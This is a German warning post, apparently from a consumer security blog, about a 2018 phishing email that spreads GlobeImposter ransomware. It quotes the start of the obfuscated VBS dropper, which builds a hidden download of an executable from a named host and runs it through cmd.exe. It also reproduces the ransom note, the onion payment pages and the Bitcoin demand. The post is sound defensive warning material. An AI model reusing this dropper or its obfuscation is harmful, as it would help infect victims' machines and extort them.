Document No 70398803 von Luisa Mifflin (accounts@Deine Domain) bringt den Verschlüsselungs- und Erpressungstrojaner ‚GlobeImposter‘ (Ransomware)!

Am Donnerstag, den 11. Januar 2018 wurde durch unbekannte Dritte die folgenden betrügerische E-Mail versendet. Öffnen Sie nicht das .7z-Archiv und führen Sie das darin enthaltene Script (.vbs) nicht aus! Die Ransomware „GlobeImposter“ (Verschlüsselungs- und Epressungstrojaner) würde Ihren PC sonst verschlüsseln!

Betreff: Document No 70398803
Absender: Luisa Mifflin (accounts@Deine Domain)

Thank you for using internet billing system

Please find your document attached

Regards

Luisa Mifflin


Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie daher nicht die Anlage! Die E-Mail kommt von unterschiedlichen Adressen. Die angeblichen Absender haben mit der E-Mail nichts zu tun!

Die E-Mail bringt ein .7z-Archiv mit, welches ein .vbs-Script enthält:

Document 70398803.7z
document_235933132.vbs

Das Script fängt so an:

Sub FunDuc(v1)
SmerD = 404
Rabinovichtoddlerselect1.Run(„cm“&“d.exe /c START „“““ „+“ “ & v1 )
End Sub

Dim Bitcoin

Public Sub FillPointWithDefaults(Point1 )

Bitcoin = „//RxR:ptthRxRex“+“e.SKVMGtq\RxRelifotevasRxRydoBes“ & „“+“nopser“+“RxR“+“etirw“+“RxR“+“nepo“+“RxR“+“epyT“+“RxR“+“PmeT“+“RxR“+“TeG“+“RxR“+“ssecorP“+“RxR“+“llehs.“+“tpircsW“+“RxR“+“noitacilppA.llehs“+“RxR“
exit sub
With Point1

.PhysicalWidth = defPointSize
.Width = .PhysicalWidth
ToLogicalLength .Width

.Locus = 0
.ParentFigure = 0
.ZOrder = 0 ‚GenerateNewPointZOrder
.Tag = 0

.FillStyle = setdefPointFill
.FillColor = setdefcolPointFill
.ForeColor = setdefcolPoint
.Shape = setdefPointShape
.ShowName = setAutoShowPointName
.ShowCoordinates = False
.NameColor = setdefcolPointName

.Visible = True

 

 

Führen Sie das Script nicht aus! Von der Adresse

  • primarynotes.online/dfjkgy7?

würde eine ausführbare Datei nachgeladen!

 

Es handelt sich um den Verschlüsselungs- und Erpressungstrojaner „GlobeImposter“ (Ransomware). Virustotal zeigt eine Erkennungsrate von 16/67.

Die Ransomware beginnt sofort damit, alle wichtigen Dateien in *.doc umzubenennen:

 

Daneben produziert „GlobeImposter“ eine Datei, die auf die Verschlüsselung hinweist:

Read___ME.html

 

Auf dem Desktop sind selbst die Links verschlüsselt:

 

Die „Read___ME.html“ zeigt folgenden Inhalt:

Your files are Encrypted!

For data recovery needs decryptor.

If you want to buy a decryptor click „Buy Decryptor“

Buy Decryptor

If not working, click again.

Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.

If you can not contact, follow these two steps:
1. Install the TOP Browser from this link: torproject.org
2. Open this link in the TOP browser: http://n224ezvhg4sgyamb.onion/sup.php

 

Die verlinkte TOR-Seite sieht so aus:

To buy the decryptor, you must pay the cost of: 0.073 Bitcoin ($ 1000)
You have 2 days for payment
time left :

after finishing offer, decryptor cost will be 0.146 Bitcoin

You can buy bitcoin on one of these sites:
blockchain.info
localbitcoins.com
google.com

send 0.073 bicoin on the Bitcoin address: **********

After payment enter your REAL e-mail to get the decryptor

Free decryption as guarantee.
Before paying you can send us 1 file for free decryption.

1. Download „Tor Browser“ from https://www.torproject.org/ and install it.
2. In the „Tor Browser“ open page here:

http://n224ezvhg4sgyamb.onion/open.php

Note! This page is available via „Tor Browser“ only.

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert